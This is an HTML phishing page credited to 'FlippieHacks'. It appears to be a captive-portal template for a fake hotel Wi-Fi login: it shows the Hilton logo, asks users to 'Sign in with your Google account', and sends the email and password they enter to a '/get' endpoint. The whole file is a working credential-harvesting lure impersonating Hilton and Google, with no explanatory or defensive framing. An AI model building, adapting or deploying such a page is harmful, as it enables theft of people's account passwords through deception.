<!--By FlippieHacks
https://github.com/FlippieHacks/ -->
<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #104C97;
  margin-right: 100px
}


.form-container {
  background: #FFFFFF;
  border: 2px solid #009CDE;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #104C97;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #104C97;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 4px solid #104C97;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #104C97;
  border: none;
  color: #ffffff;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  font-weight: bold;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #104C97;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="200.000000pt" height="100.000000pt" viewBox="0 0 610.000000 331.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,331.000000) scale(0.100000,-0.100000)"
fill="#104C97" stroke="none">
<path d="M2936 2969 c-329 -38 -651 -210 -822 -439 -192 -258 -138 -599 130
-817 55 -45 59 -46 72 -29 12 17 10 23 -19 55 -110 122 -187 297 -187 425 0
128 50 243 147 342 173 175 493 286 868 301 478 19 838 -181 895 -497 31 -172
-39 -379 -175 -515 -114 -113 -254 -183 -456 -226 -84 -18 -137 -23 -274 -23
-163 -1 -173 0 -243 27 -221 85 -366 244 -365 401 0 179 189 339 393 335 98
-2 123 -16 30 -16 -54 -1 -105 -8 -140 -20 l-55 -18 -3 -203 -2 -202 172 2
173 3 3 203 2 202 33 0 c17 -1 48 -9 67 -18 l35 -17 3 -187 2 -187 33 -3 c32
-4 32 -4 -23 -30 -43 -21 -171 -48 -227 -48 -2 0 -3 -12 -3 -26 l0 -27 88 6
c157 12 255 51 304 122 56 80 55 188 -2 299 -36 71 -15 58 26 -16 25 -47 29
-63 29 -138 0 -47 -4 -98 -8 -113 l-8 -28 68 3 68 3 0 390 0 390 -172 3 -173
2 0 -154 c0 -101 -4 -157 -11 -162 -6 -3 -37 -1 -70 6 l-59 13 0 148 0 149
-175 0 -175 0 0 -143 0 -144 -61 -17 c-232 -64 -390 -263 -349 -438 24 -104
92 -197 195 -268 70 -48 255 -137 325 -157 102 -28 448 -25 586 5 572 124 896
468 771 818 -130 362 -524 623 -1016 673 -114 12 -144 12 -245 0z"/>
<path d="M2805 1344 c-11 -2 -68 -6 -127 -9 -96 -6 -108 -9 -108 -25 0 -15 9
-19 43 -22 l42 -3 3 -442 2 -443 -40 0 c-36 0 -40 -2 -40 -25 l0 -25 178 2
c169 3 177 4 177 23 0 16 -8 21 -42 23 l-43 3 0 475 c0 373 -3 474 -12 473 -7
-1 -22 -3 -33 -5z"/>
<path d="M2298 1271 c-28 -25 -33 -36 -33 -76 0 -40 5 -51 33 -76 43 -39 84
-39 123 0 24 24 29 38 29 76 0 38 -5 52 -29 76 -39 39 -80 39 -123 0z"/>
<path d="M1112 1223 c2 -14 15 -19 56 -21 l52 -3 0 -405 0 -404 -56 0 c-47 0
-55 -3 -52 -17 3 -17 22 -18 228 -18 203 0 225 2 228 17 3 14 -6 17 -55 20
l-58 3 0 195 0 195 155 0 155 0 0 -195 0 -195 -52 -3 c-45 -3 -53 -6 -53 -23
0 -19 7 -19 222 -17 203 3 223 5 226 20 3 15 -5 18 -52 18 l-56 0 0 404 0 405
52 3 c41 2 54 7 56 21 3 16 -13 17 -222 17 -219 0 -226 -1 -226 -20 0 -18 7
-20 55 -20 l55 0 0 -180 0 -181 -157 3 -158 3 0 175 0 175 55 5 c40 4 55 9 55
20 0 13 -33 15 -228 18 -214 2 -228 1 -225 -15z"/>
<path d="M3070 1090 l0 -110 -40 0 c-36 0 -40 -2 -40 -25 0 -22 4 -25 40 -25
l40 0 0 -232 c1 -351 1 -351 176 -356 64 -2 132 -1 150 3 30 5 34 10 34 35 l0
30 -69 0 c-103 0 -101 -7 -101 282 l0 238 55 0 c52 0 55 1 55 25 0 24 -3 25
-55 25 l-55 0 0 110 0 110 -95 0 -95 0 0 -110z"/>
<path d="M2310 945 c-114 -8 -135 -13 -138 -27 -3 -14 6 -17 45 -20 l48 -3 3
-247 2 -247 -42 -3 c-35 -2 -43 -7 -43 -23 0 -19 7 -20 180 -20 173 0 180 1
180 20 0 16 -8 21 -42 23 l-43 3 0 274 c0 151 -3 275 -7 277 -5 2 -69 -1 -143
-7z"/>
<path d="M3740 947 c-110 -25 -187 -90 -226 -193 -23 -60 -16 -193 13 -249 27
-51 85 -106 143 -136 68 -34 204 -39 285 -9 77 29 155 105 178 175 19 54 22
151 7 205 -43 155 -222 247 -400 207z m144 -38 c44 -20 51 -58 51 -259 -1
-208 -11 -251 -62 -271 -37 -14 -101 -5 -124 18 -26 25 -39 106 -39 232 0 159
14 241 46 269 28 25 86 30 128 11z"/>
<path d="M4298 943 c-50 -3 -58 -7 -58 -23 0 -17 7 -20 45 -20 l45 0 0 -250 0
-250 -40 0 c-36 0 -40 -2 -40 -25 l0 -25 173 2 c164 3 172 4 172 23 0 15 -8
21 -32 23 l-33 3 0 172 c0 160 2 176 24 223 13 28 36 60 51 72 35 28 90 29
105 3 6 -12 10 -109 10 -245 l0 -225 -32 -3 c-25 -2 -33 -8 -33 -23 0 -19 8
-20 168 -23 l167 -2 0 25 c0 22 -4 25 -39 25 l-40 0 -3 233 c-2 172 -7 239
-17 259 -20 38 -68 58 -143 58 -80 0 -140 -29 -183 -88 -16 -22 -33 -41 -37
-41 -5 -1 -8 28 -8 64 l0 65 -82 -2 c-46 -1 -109 -3 -140 -5z"/>
</g>
</svg>

  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b>Google</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue as guest</button>
    </form>

  </div>

</div>
</body>
</html>
